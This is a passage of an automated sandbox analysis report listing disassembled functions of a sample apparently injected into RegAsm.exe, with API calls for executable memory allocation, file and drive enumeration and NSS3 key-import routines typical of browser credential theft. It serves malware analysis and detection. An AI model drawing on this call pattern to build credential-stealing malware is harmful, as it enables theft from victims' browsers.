                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AttributesFileH_prolog
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3244726999-0
                                                                                                                                                                                                                                                                  • Opcode ID: e9247a96475f21c435104b1576c3d224e519b3060484702e6ba07ea2b90f97aa
                                                                                                                                                                                                                                                                  • Instruction ID: b203f50d24e504eb0f28bc6b24f46a56a06a5c8a305458894914663eac43b770
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9247a96475f21c435104b1576c3d224e519b3060484702e6ba07ea2b90f97aa
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96E09234900518ABCB14EF64C5456CC7724FF01764F10836FEC72A26D1DB388A86CA84
                                                                                                                                                                                                                                                                  Function 00405AA6 Relevance: 2.6, APIs: 2, Instructions: 68memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,?,00000000,?,?,00405EA8,00000000,00000000), ref: 00405B05
                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00000000,?,?,00405EA8,00000000,00000000), ref: 00405B31
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                  • Opcode ID: ef9e616107430d77fd001a40b7e67720167dd967026149857909ede2e788de90
                                                                                                                                                                                                                                                                  • Instruction ID: 8b246569a91d498fdde8d9096e1c7904f0a18a558dbadbecc3a6c047a34df5fb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef9e616107430d77fd001a40b7e67720167dd967026149857909ede2e788de90
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0021A171740B049BCB24CF74CD81B9BB7F9EB41314F24092AE61AD72D0E678A980CE18
                                                                                                                                                                                                                                                                  Function 0040D44E Relevance: 1.7, APIs: 1, Instructions: 221COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040D453
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D07: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D38
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: _EH_prolog.MSVCRT ref: 00410CC8
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: GetFileAttributesA.KERNEL32(00000000,?,0040BB15,?,00425C4E,?,?), ref: 00410CDC
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1DA: _EH_prolog.MSVCRT ref: 0040C1DF
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1DA: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C232
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1DA: memcmp.MSVCRT ref: 0040C270
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2375657845-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7c197755c0485ce24ad81b958bb994dff541be477c51968cb0f1c643c7bb1cad
                                                                                                                                                                                                                                                                  • Instruction ID: 67a6d89e42dae1a589c4ad739d30db411377f20cfca735d1cc92dc772a9b020b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c197755c0485ce24ad81b958bb994dff541be477c51968cb0f1c643c7bb1cad
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55915A71900248EADF11EBE5D946BDEBBB8AF15308F10417FE44573282EA78570C8BA6
                                                                                                                                                                                                                                                                  Function 0040A8E6 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040A8EB
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00409FC5: _EH_prolog.MSVCRT ref: 00409FCA
                                                                                                                                                                                                                                                                    • Part of subcall function 00409FC5: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00425C06,00000000,-00000020,00000000), ref: 0040A049
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$FileFindFirstlstrcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1592259726-0
                                                                                                                                                                                                                                                                  • Opcode ID: 32d91941147409a14a21bcd6afec0253f03cf6d386e948356a1537b8856dbace
                                                                                                                                                                                                                                                                  • Instruction ID: bf25fb03bc8260b26ad3435b50df854a9e8b5ac1992e2269c35b06e2c96efe23
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32d91941147409a14a21bcd6afec0253f03cf6d386e948356a1537b8856dbace
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F2161B1900248EECF21EF69C5067DDBBB4AF45318F00416EE88463281D73957488BE7
                                                                                                                                                                                                                                                                  Function 00401ED6 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00401EDB
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00401162: _EH_prolog.MSVCRT ref: 00401167
                                                                                                                                                                                                                                                                    • Part of subcall function 00401162: FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$FileFindFirstlstrcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1592259726-0
                                                                                                                                                                                                                                                                  • Opcode ID: 332e54513b70f1b5b4853610c6fd52a9b6d535bc6725a939e86838aa9fae8023
                                                                                                                                                                                                                                                                  • Instruction ID: 30a84cab74b583b3c1f0c9c10384f51fed619b229386f4bfee07d3f7914f6ee1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 332e54513b70f1b5b4853610c6fd52a9b6d535bc6725a939e86838aa9fae8023
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39215071D00248ABDF20EB69C94679DBBB4AF44314F00456EE89463282DB395B498BD6
                                                                                                                                                                                                                                                                  Function 00415B3E Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00415B43
                                                                                                                                                                                                                                                                    • Part of subcall function 00412D48: _EH_prolog.MSVCRT ref: 00412D4D
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00415947: _EH_prolog.MSVCRT ref: 0041594C
                                                                                                                                                                                                                                                                    • Part of subcall function 00415947: GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004159AE
                                                                                                                                                                                                                                                                    • Part of subcall function 00415947: memset.MSVCRT ref: 004159CD
                                                                                                                                                                                                                                                                    • Part of subcall function 00415947: GetDriveTypeA.KERNEL32(?), ref: 004159D6
                                                                                                                                                                                                                                                                    • Part of subcall function 00415947: lstrcpy.KERNEL32(?,00000000), ref: 004159F6
                                                                                                                                                                                                                                                                    • Part of subcall function 00415947: lstrcpy.KERNEL32(?,00000000), ref: 00415A37
                                                                                                                                                                                                                                                                    • Part of subcall function 00415947: lstrlenA.KERNEL32(?), ref: 00415A9C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$Drivelstrcpy$LogicalStringsTypelstrlenmemset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 373919974-0
                                                                                                                                                                                                                                                                  • Opcode ID: bc635ab83ed698c1885f40d88955efa9ba8930cead1986ea585800c8226e077a
                                                                                                                                                                                                                                                                  • Instruction ID: 4d9bc80d358c7c53a3611b2ae44ad7ffd2dee547bad13b87d34fc6488bc7038d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc635ab83ed698c1885f40d88955efa9ba8930cead1986ea585800c8226e077a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C01C071800258DBCF10EF68C9427EEBB70FF80368F10411AE855A3281C7385B85CBDA
                                                                                                                                                                                                                                                                  Function 00410D07 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D38
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1699248803-0
                                                                                                                                                                                                                                                                  • Opcode ID: d938b7403aeb2ccd386006a1860f7067fb850bd90ddcc148c78c6e904d7dfd74
                                                                                                                                                                                                                                                                  • Instruction ID: 09725d422df247d4677e6b7a409359ad8eaee5c3e7198fef1f725c30409a6d67
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d938b7403aeb2ccd386006a1860f7067fb850bd90ddcc148c78c6e904d7dfd74
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9DF01C7990014CBBDB11DB64C8909EDB7FDEBC4700F00C1A6A909A3280DA349F469B50

                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                  Function 6C977C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C977C33
                                                                                                                                                                                                                                                                  • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C977C66
                                                                                                                                                                                                                                                                  • CERT_DestroyCertificate.NSS3(00000000), ref: 6C977D1E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: SECOID_FindOID_Util.NSS3(?,?,?,6C9791C5), ref: 6C97788F
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C977D48
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE067,00000000), ref: 6C977D71
                                                                                                                                                                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C977DD3
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C977DE1
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C977DF8
                                                                                                                                                                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C977E1A
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE067,00000000), ref: 6C977E58
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9791C5), ref: 6C9778BB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C9791C5), ref: 6C9778FA
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C9791C5), ref: 6C977930
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C9791C5), ref: 6C977951
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C977964
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C97797A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C977988
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C977998
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: free.MOZGLUE(00000000), ref: 6C9779A7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C9791C5), ref: 6C9779BB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: PR_GetCurrentThread.NSS3(?,?,?,?,6C9791C5), ref: 6C9779CA
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C977E49
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C977F8C
                                                                                                                                                                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C977F98
                                                                                                                                                                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C977FBF
                                                                                                                                                                                                                                                                  • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C977FD9
                                                                                                                                                                                                                                                                  • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6C978038
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C978050
                                                                                                                                                                                                                                                                  • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C978093
                                                                                                                                                                                                                                                                  • SECOID_FindOID_Util.NSS3 ref: 6C977F29
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9707B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C918298,?,?,?,6C90FCE5,?), ref: 6C9707BF
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9707B0: PL_HashTableLookup.NSS3(?,?), ref: 6C9707E6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C97081B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C970825
                                                                                                                                                                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C978072
                                                                                                                                                                                                                                                                  • SECOID_FindOID_Util.NSS3 ref: 6C9780F5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C97BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C97800A,00000000,?,00000000,?), ref: 6C97BC3F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2815116071-0
                                                                                                                                                                                                                                                                  • Opcode ID: 097ee5d04b315d69b525599fca14132eb3f651d89fc12a611c2522b11e018acb
                                                                                                                                                                                                                                                                  • Instruction ID: 2b652b30763cae8884766c9b55392e75dc7d94d6bd09c25a980fda0e3551388d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 097ee5d04b315d69b525599fca14132eb3f651d89fc12a611c2522b11e018acb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38E191716063009FE725CF28C984B5A77E9EF5470CF14496DE89A9BB60E731E805CBA2
                                                                                                                                                                                                                                                                  Function 00415F6A Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 201stringmemoryfileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00415F6F
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00415F87
